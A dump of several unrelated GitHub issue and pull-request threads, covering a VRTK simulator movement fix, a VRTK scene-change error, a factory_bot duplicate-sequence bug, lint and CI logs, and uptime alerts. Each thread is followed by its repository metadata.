@mattboy64 I get that, but since most of the interaction is done with the controllers and they have a position relative to the play area, it makes some sense to move the CameraRig (since with this we still move around and see in the pc screen what we are doing). This way you can use the controllers to test things without putting on the headset.
Still, since the controllers have their position tracked inside the play area, some means to have the headset camera stay in a given position inside the play area would make testing faster. I.E. having it "behind" your chair pointing towards the screen so you can just grab the controllers and watch the screen to test.
Ah, good point. I think both are valid ideas. I'd love some fake controllers and controller movement too.
In PlayerPresence StartPhysicsFall(), I had to rotate the velocity argument/parameter to offset any CameraRig rotation. Otherwise, when you throw yourself off something with PlayerClimb, you fly off in the wrong direction. Just mentioning this in case there is a shared solution to all these issues.
VRTK_Simulator.cs:Line 110
Change from
transform.Translate(movDir * stepSize);
to
transform.Translate(transform.InverseTransformDirection(movDir * stepSize));
Seems to be because of a discrepancy between the Translate space, and the cam.forward space. Not sure which is using worldspace or localspace, but this fixed it for me.
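The underlying mix-up is the usual world-space vs local-space confusion: cam.forward is a world-space direction, while Translate by default applies its argument in the transform's local space, so a rotated transform effectively applies its rotation a second time. A small Python illustration of why a 180° yaw flips an un-corrected forward vector (pure math, not the Unity API):

```python
import math

def rotate_y(v, degrees):
    # Rotate a 3D vector (x, y, z) around the Y axis (Unity's up axis).
    r = math.radians(degrees)
    x, y, z = v
    return (x * math.cos(r) + z * math.sin(r), y, -x * math.sin(r) + z * math.cos(r))

world_forward = (0.0, 0.0, 1.0)
# A transform rotated 180 degrees re-applies its own rotation to an
# already world-space direction, reversing it:
doubly_rotated = rotate_y(world_forward, 180)
print(doubly_rotated)  # z component ≈ -1
```

Mapping the world-space direction back into local space (as InverseTransformDirection does) cancels that extra rotation.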
I think we should deprecate the old simulator now we have the new Simulator SDK
|
gharchive/issue
| 2016-09-01T06:31:26 |
2025-04-01T04:36:04.694306
|
{
"authors": [
"Moojuiceman",
"mattboy64",
"ridoutb",
"sblancodiez",
"thestonefox"
],
"repo": "thestonefox/SteamVR_Unity_Toolkit",
"url": "https://github.com/thestonefox/SteamVR_Unity_Toolkit/issues/494",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
236339992
|
DontDestroyOnLoad Oculus SDK
On the latest version of VRTK from Git, when changing scene, I receive 999+ errors in the console:
1) MissingReferenceException: The object of type 'VRTK_TransformFollow' has been destroyed but you are still trying to access it.
Your script should either check if it is null or you should not destroy the object.
VRTK.VRTK_BasePointerRenderer.UpdatePointerOriginTransformFollow () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:316)
VRTK.VRTK_BasePointerRenderer.FixedUpdate () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:276)
2) MissingReferenceException: The object of type 'GameObject' has been destroyed but you are still trying to access it.
Your script should either check if it is null or you should not destroy the object.
VRTK.VRTK_BasePointerRenderer.GetOrigin (Boolean smoothed) (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_BasePointerRenderer.cs:333)
VRTK.VRTK_StraightPointerRenderer.CastRayForward () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_StraightPointerRenderer.cs:188)
VRTK.VRTK_StraightPointerRenderer.UpdateRenderer () (at Assets/VRTK/Scripts/Pointers/PointerRenderers/VRTK_StraightPointerRenderer.cs:53)
VRTK.VRTK_Pointer.HandleEnabledPointer () (at Assets/VRTK/Scripts/Pointers/VRTK_Pointer.cs:325)
VRTK.VRTK_Pointer.Update () (at Assets/VRTK/Scripts/Pointers/VRTK_Pointer.cs:285)
I use Unity 5.6.1p1 and Oculus 1.15. No SteamVR.
https://github.com/thestonefox/VRTK/issues/1145
@bddckr is it ok to close this issue if it's a duplicate of #1145 ?
@thestonefox We could use one of these issues to remind us to fix "I want to use the same VRTK SDK Manager hierarchy in one scene and persist it properly". Some VRTK objects just don't know about the persist on load setting on the SDK Manager...
may be worth just creating a new issue and then linking this one and #1145 to it?
@bddckr do you want to raise the issue? I'm struggling to word it correctly. You don't need to follow the official template ;) just get something in so we can close this one :)
Will fix the mentioned issue with #1301.
Change of plans: Persist on Load issues when changing scenes will be done later, not part of #1301.
Superseded by #1316.
|
gharchive/issue
| 2017-06-15T23:20:17 |
2025-04-01T04:36:04.701371
|
{
"authors": [
"D3m0n92",
"bddckr",
"thestonefox"
],
"repo": "thestonefox/VRTK",
"url": "https://github.com/thestonefox/VRTK/issues/1290",
"license": "mit",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2210824511
|
lint: Enable more ruff rulesets
Minor fixes were needed; the only possibly interesting one is in RequestsFetcher (use "yield from").
This is part of #2567
I expect this to currently fail tests for unrelated reasons, #2591 should fix it
I expect this to currently fail tests for unrelated reasons, https://github.com/theupdateframework/python-tuf/pull/2591 should fix it
Just merged the fix. This PR should pass on rebase.
|
gharchive/pull-request
| 2024-03-27T13:34:19 |
2025-04-01T04:36:04.705746
|
{
"authors": [
"jku",
"lukpueh"
],
"repo": "theupdateframework/python-tuf",
"url": "https://github.com/theupdateframework/python-tuf/pull/2592",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
431334963
|
V-3 SystemIdleProcess executes unnecessary instructions
Test 1: ./Simulator A idontexist 0
Fixed
|
gharchive/issue
| 2019-04-10T06:58:36 |
2025-04-01T04:36:04.712438
|
{
"authors": [
"thewilly"
],
"repo": "thewilly/GIISOF01-2-006-Operating-Systems",
"url": "https://github.com/thewilly/GIISOF01-2-006-Operating-Systems/issues/2",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
406894244
|
Update _loraModem.ino
Modified loraWait() to avoid hangs when tmst is in the past
Thanks! Instead of changing the first reference to waitTime it would also be possible to change the definition of waitTime to int32_t (instead of unsigned). I think it makes little difference to the execution time though.
Maarten
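For anyone else hitting this: the hang comes from unsigned wrap-around. If the target timestamp tmst is already in the past, an unsigned wait time underflows to a value near 2^32, so the wait effectively never ends. A Python model of the two interpretations (the actual code is C; names assumed):

```python
U32 = 1 << 32

def wait_unsigned(tmst, now):
    # uint32_t subtraction: a past tmst wraps to a huge positive wait.
    return (tmst - now) % U32

def wait_signed(tmst, now):
    # int32_t reinterpretation: a past tmst becomes negative
    # and can be clamped to zero instead of hanging.
    d = (tmst - now) % U32
    return d - U32 if d >= (1 << 31) else d

print(wait_unsigned(1_000, 2_000))  # → 4294966296 (hang-sized wait)
print(wait_signed(1_000, 2_000))    # → -1000 (clampable to 0)
```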
|
gharchive/pull-request
| 2019-02-05T17:31:36 |
2025-04-01T04:36:04.725769
|
{
"authors": [
"nicolasimeoni",
"platenspeler"
],
"repo": "things4u/ESP-1ch-Gateway-v5.0",
"url": "https://github.com/things4u/ESP-1ch-Gateway-v5.0/pull/61",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1936756482
|
Bmi calculator yashwanthvarma18
Developer Checklist
[x] Followed guidelines mentioned in the readme file.
[x] Followed directory structure. (e.g. ProjectName/{USERNAME}/...yourfiles)
[x] Starred ⭐ the Repo (Optional)
Summary
I have developed a BMI Calculator using HTML, CSS, and JavaScript. The BMI Calculator takes user input for height and weight, calculates the Body Mass Index (BMI), and provides a BMI category. It also features a professional user interface with background styling.
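The core of such a calculator is a one-line formula plus threshold bands; a Python sketch (the submitted app is JavaScript, and these cut-offs follow the common WHO bands, which the app may or may not use exactly):

```python
def bmi(weight_kg: float, height_m: float) -> float:
    # Body Mass Index: weight divided by height squared.
    return weight_kg / height_m ** 2

def category(value: float) -> str:
    if value < 18.5:
        return "Underweight"
    if value < 25:
        return "Normal"
    if value < 30:
        return "Overweight"
    return "Obese"

b = bmi(70, 1.75)
print(round(b, 1), category(b))  # → 22.9 Normal
```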
Screenshot
@thinkswell @PBJI please review the PR and merge it
@yashwanthvarma18 you can only add one project at a time, but it seems you are trying to add two. Please delete QuizApp or commit your BMICalculator app in a fresh branch and re-open the PR.
ok
|
gharchive/pull-request
| 2023-10-11T04:10:26 |
2025-04-01T04:36:04.756090
|
{
"authors": [
"PBJI",
"yashwanthvarma18"
],
"repo": "thinkswell/javascript-mini-projects",
"url": "https://github.com/thinkswell/javascript-mini-projects/pull/856",
"license": "Unlicense",
"license_type": "permissive",
"license_source": "github-api"
}
|
2520831300
|
Add Linked wallets page in account layout
Problem solved
Short description of the bug fixed or feature added
#4542 👈
main
This stack of pull requests is managed by Graphite. Learn more about stacking.
|
gharchive/pull-request
| 2024-09-11T21:38:33 |
2025-04-01T04:36:04.775690
|
{
"authors": [
"MananTank"
],
"repo": "thirdweb-dev/js",
"url": "https://github.com/thirdweb-dev/js/pull/4542",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
100326232
|
Embedded document can also have data in a list
Lists in HAL are in an embedded object, which wasn't supported by default. Another nested dict had to be used.
{
"_links": {
"self": { "href": "/orders" },
"curies": [{ "name": "ea", "href": "http://example.com/docs/rels/{rel}", "templated": true }],
"next": { "href": "/orders?page=2" },
"ea:find": {
"href": "/orders{?id}",
"templated": true
},
"ea:admin": [{
"href": "/admins/2",
"title": "Fred"
}, {
"href": "/admins/5",
"title": "Kate"
}]
},
"currentlyProcessing": 14,
"shippedToday": 20,
"_embedded": {
"ea:order": [{
"_links": {
"self": { "href": "/orders/123" },
"ea:basket": { "href": "/baskets/98712" },
"ea:customer": { "href": "/customers/7809" }
},
"total": 30.00,
"currency": "USD",
"status": "shipped"
}, {
"_links": {
"self": { "href": "/orders/124" },
"ea:basket": { "href": "/baskets/97213" },
"ea:customer": { "href": "/customers/12369" }
},
"total": 20.00,
"currency": "USD",
"status": "processing"
}]
}
}
@peeklondon @peeklondon CR please.
:+1:
|
gharchive/pull-request
| 2015-08-11T14:32:30 |
2025-04-01T04:36:04.790789
|
{
"authors": [
"krak3n",
"radeklos"
],
"repo": "thisissoon/Flask-HAL",
"url": "https://github.com/thisissoon/Flask-HAL/pull/15",
"license": "unlicense",
"license_type": "permissive",
"license_source": "bigquery"
}
|
194143181
|
Will help maintain the repo
Hey @thomasdavis
If you're okay with it I will help maintain the repo, as I do a lot of work in this area. If not, feel free to close it.
Don't have to ask me twice, welcome to the team! =D
woooo :) awesome stuff
|
gharchive/issue
| 2016-12-07T19:22:58 |
2025-04-01T04:36:04.807945
|
{
"authors": [
"RobertJGabriel",
"thomasdavis"
],
"repo": "thomasdavis/w3cjs",
"url": "https://github.com/thomasdavis/w3cjs/issues/29",
"license": "unlicense",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2523140198
|
🛑 Speedtest-v2-HEL1-1 is down
In e7263e0, Speedtest-v2-HEL1-1 ($URL_SPEEDTEST_V2_HEL1_1) was down:
HTTP code: 0
Response time: 0 ms
Resolved: Speedtest-v2-HEL1-1 is back up in e041753 after 1 hour, 55 minutes.
RCA: https://github.com/thomasmerz/upptime/issues/2990
|
gharchive/issue
| 2024-09-12T19:05:24 |
2025-04-01T04:36:04.833925
|
{
"authors": [
"thomasmerz"
],
"repo": "thomasmerz/upptime",
"url": "https://github.com/thomasmerz/upptime/issues/3035",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2614109150
|
🛑 Pihole-KA is down
In 76095d7, Pihole-KA ($URL_PIHOLE_MERZ_NIMBUS) was down:
HTTP code: 0
Response time: 0 ms
This should be fixed now for the future: https://github.com/thomasmerz/issue-tracker/issues/518
Resolved: Pihole-KA is back up in 0c94768 after 1 hour, 6 minutes.
|
gharchive/issue
| 2024-10-25T13:26:27 |
2025-04-01T04:36:04.836689
|
{
"authors": [
"thomasmerz"
],
"repo": "thomasmerz/upptime",
"url": "https://github.com/thomasmerz/upptime/issues/3186",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1781852163
|
how exactly does the color method on Embeds work?
Are we supposed to pass in a hex value, or RGB? There is no documentation or example for this method.
Hey! I did some testing, and it takes the hex code of whatever color you want, converted to a decimal, then to a string.
FF5555 → 16733525 → "16733525"
You probably moved on from this problem a long time ago haha but I'm putting this here for anyone else who may have the same question!
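So the conversion is just hex → decimal → string; in Python terms (the library itself is Rust, so this is only an illustration of the conversion):

```python
def embed_color(hex_color: str) -> str:
    # "FF5555" → 16733525 → "16733525"
    return str(int(hex_color, 16))

print(embed_color("FF5555"))  # → 16733525
```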
Thank you so much! Sadly, it's a bit late since I switched to Go and PocketBase to have a websocket end-point. Still, it will help in my other projects.
|
gharchive/issue
| 2023-06-30T04:14:46 |
2025-04-01T04:36:04.848920
|
{
"authors": [
"Blastbrean",
"i1Fury"
],
"repo": "thoo0224/webhook-rs",
"url": "https://github.com/thoo0224/webhook-rs/issues/19",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1720817069
|
chore: fix linting errors
n/a
Run sudo apt update
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Hit:1 http://azure.archive.ubuntu.com/ubuntu jammy InRelease
Get:2 http://azure.archive.ubuntu.com/ubuntu jammy-updates InRelease [119 kB]
Get:3 http://azure.archive.ubuntu.com/ubuntu jammy-backports InRelease [108 kB]
Get:4 http://azure.archive.ubuntu.com/ubuntu jammy-security InRelease [110 kB]
Get:5 https://packages.microsoft.com/ubuntu/22.04/prod jammy InRelease [3611 B]
Get:6 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages [605 kB]
Get:7 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main Translation-en [171 kB]
Get:8 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main amd64 c-n-f Metadata [14.5 kB]
Get:9 http://azure.archive.ubuntu.com/ubuntu jammy-updates/restricted amd64 Packages [260 kB]
Get:10 http://azure.archive.ubuntu.com/ubuntu jammy-updates/restricted Translation-en [38.7 kB]
Get:11 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 Packages [905 kB]
Get:12 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe Translation-en [186 kB]
Get:13 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 c-n-f Metadata [18.9 kB]
Get:14 http://azure.archive.ubuntu.com/ubuntu jammy-updates/multiverse amd64 Packages [35.3 kB]
Get:15 http://azure.archive.ubuntu.com/ubuntu jammy-updates/multiverse Translation-en [8452 B]
Get:16 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy InRelease [23.8 kB]
Get:17 http://azure.archive.ubuntu.com/ubuntu jammy-security/main amd64 Packages [390 kB]
Get:18 http://azure.archive.ubuntu.com/ubuntu jammy-security/main Translation-en [112 kB]
Get:19 http://azure.archive.ubuntu.com/ubuntu jammy-security/main amd64 c-n-f Metadata [9812 B]
Get:20 http://azure.archive.ubuntu.com/ubuntu jammy-security/restricted amd64 Packages [260 kB]
Get:21 http://azure.archive.ubuntu.com/ubuntu jammy-security/restricted Translation-en [38.3 kB]
Get:22 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe amd64 Packages [726 kB]
Get:23 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe Translation-en [126 kB]
Get:24 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe amd64 c-n-f Metadata [14.6 kB]
Get:25 http://azure.archive.ubuntu.com/ubuntu jammy-security/multiverse amd64 Packages [30.2 kB]
Get:26 http://azure.archive.ubuntu.com/ubuntu jammy-security/multiverse Translation-en [5828 B]
Get:27 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main amd64 Packages [64.8 kB]
Get:28 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main all Packages [904 B]
Get:29 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main armhf Packages [7357 B]
Get:30 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main arm64 Packages [14.2 kB]
Get:31 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy/main amd64 Packages [15.7 kB]
Get:32 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy/main Translation-en [7292 B]
Fetched 4430 kB in 2s (2591 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
79 packages can be upgraded. Run 'apt list --upgradable' to see them.
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Reading package lists...
Building dependency tree...
Reading state information...
snapd is already the newest version (2.58+22.04).
snapd set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 79 not upgraded.
vale (edge) 2.15.4 from Joseph Kato (jdkato) installed
prose:check
vale --minAlertLevel error --output=docs/.vale/vale.tmpl docs
docs/DreamBig/Documentation & QA/2023_T1_UX/UX-Testing-Report.md:
Line 279, position 15 (rule thothtech.American)
error: Use the British spelling "standardised" instead of the American "standardized".
More information: TBA
docs/DreamBig/Documentation & QA/2023_T1_UX/UX-Testing-Report.md:
Line 316, position 44 (rule thothtech.American)
error: Use the British spelling "standardised" instead of the American "standardized".
More information: TBA
2 errors, 0 warnings, and 0 suggestions found.
Error: Process completed with exit code 1.
|
gharchive/pull-request
| 2023-05-22T23:35:27 |
2025-04-01T04:36:04.981781
|
{
"authors": [
"Josh-Piper",
"maddernd"
],
"repo": "thoth-tech/documentation",
"url": "https://github.com/thoth-tech/documentation/pull/309",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
406376024
|
FactoryBot::DuplicateDefinitionError when defining the same-named sequence in the same-named trait in distinct factories
After upgrading to 5.0, I'm seeing this error:
Sequence already registered: from_api_id (FactoryBot::DuplicateDefinitionError)
This code previously worked in 4.x. I've looked at the release notes, but there's nothing obvious there about this (at least to me as a casual user of factory_bot).
Steps to reproduce
Gemfile
# frozen_string_literal: true
source "https://rubygems.org"
gem "factory_bot", "~>5"
example.rb
require 'factory_bot'
User = Struct.new(:id)
Company = Struct.new(:id)
FactoryBot.define do
factory :user, class: User do
trait :from_api do
sequence(:id, '1')
end
end
factory :company, class: Company do
trait :from_api do
sequence(:id, '1')
end
end
end
$ bundle exec ruby example.rb
Traceback (most recent call last):
18: from example.rb:6:in `<main>'
17: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:7:in `define'
16: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:49:in `run'
15: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:49:in `instance_eval'
14: from example.rb:13:in `block in <main>'
13: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:18:in `factory'
12: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:18:in `instance_eval'
11: from example.rb:14:in `block (2 levels) in <main>'
10: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:174:in `trait'
9: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:174:in `new'
8: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/trait.rb:12:in `initialize'
7: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/trait.rb:12:in `instance_eval'
6: from example.rb:15:in `block (3 levels) in <main>'
5: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:122:in `sequence'
4: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:105:in `register_sequence'
3: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:105:in `each'
2: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:106:in `block in register_sequence'
1: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/decorator/disallows_duplicates_registry.rb:6:in `register'
/Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/decorator.rb:10:in `method_missing': Sequence already registered: __from_api_id__ (FactoryBot::DuplicateDefinitionError)
Ruby Versions:
ruby 2.5.3p105 (2018-10-18 revision 65156) [x86_64-darwin18]
ruby 2.6.0p0 (2018-12-25 revision 66547) [x86_64-darwin18]
macOS 10.14.3
Thanks for the issue! That does seem unexpected. I'll try to look into this before the end of the week.
It occurred to me that this is probably because of #1164.
Seems reasonable:
We register them with __#{factory_name}_#{sequence_name}__
We register them with __#{factory_name}_#{sequence_name}__
I don't think that is really true. We register them with @definition.name, which could be either a factory name or a trait name.
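In other words, an inline sequence's registry key is built from the enclosing definition's name, and a trait is its own definition, so two factories each declaring a trait named from_api with a sequence id both try to register __from_api_id__. A small Python model of that collision (the real code is Ruby; the key scheme mirrors the traceback above):

```python
class DuplicateDefinitionError(Exception):
    pass

registry = set()

def register_sequence(definition_name, sequence_name):
    # Key mirrors factory_bot 5.0's __<definition>_<sequence>__ scheme.
    key = f"__{definition_name}_{sequence_name}__"
    if key in registry:
        raise DuplicateDefinitionError(f"Sequence already registered: {key}")
    registry.add(key)

register_sequence("from_api", "id")      # trait inside factory :user
try:
    register_sequence("from_api", "id")  # same-named trait in :company
except DuplicateDefinitionError as e:
    print(e)  # → Sequence already registered: __from_api_id__
```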
I don't think that is really true
You should have a stern talking-to with the developer that opened that PR then 😉
Thanks!
@composerinteralia there is an odd corner case where raising this error causes problems:
Scenario:
you're in a lengthy transition to break down a monolith
some of the code and factories were already pulled-out into an internal gem 🎉
you're working in another repo, something odd breaks, caused by a factory in that gem
copying that factory code over into your current repo could help with setting a breakpoint,
but FactoryBot will throw an error when it encounters the second definition introduced by the gem 😢
Is there a clever way to recover from FactoryBot::DuplicateDefinitionError and just ignore the second definition?
@composerinteralia Could this optionally just print an error message to the console and ignore the second definition?
Perhaps print the FILE location of the second definition?
https://github.com/thoughtbot/factory_bot/blob/893eb67bbbde9d7f482852cc5133b4ab57e34b97/lib/factory_bot/decorator/disallows_duplicates_registry.rb#L6
@tilo I think it'd be best to to either open a separate issue or add a comment on an open issue (https://github.com/thoughtbot/factory_bot/issues/968 perhaps, especially as it relates to https://github.com/thoughtbot/factory_bot/pull/1064).
This particular issue was for a bug where we incorrectly raised a DuplicateDefinitionError. We've fixed that particular bug, so additional comments on this issue may get lost.
|
gharchive/issue
| 2019-02-04T15:16:10 |
2025-04-01T04:36:05.001779
|
{
"authors": [
"composerinteralia",
"shepmaster",
"tilo"
],
"repo": "thoughtbot/factory_bot",
"url": "https://github.com/thoughtbot/factory_bot/issues/1257",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|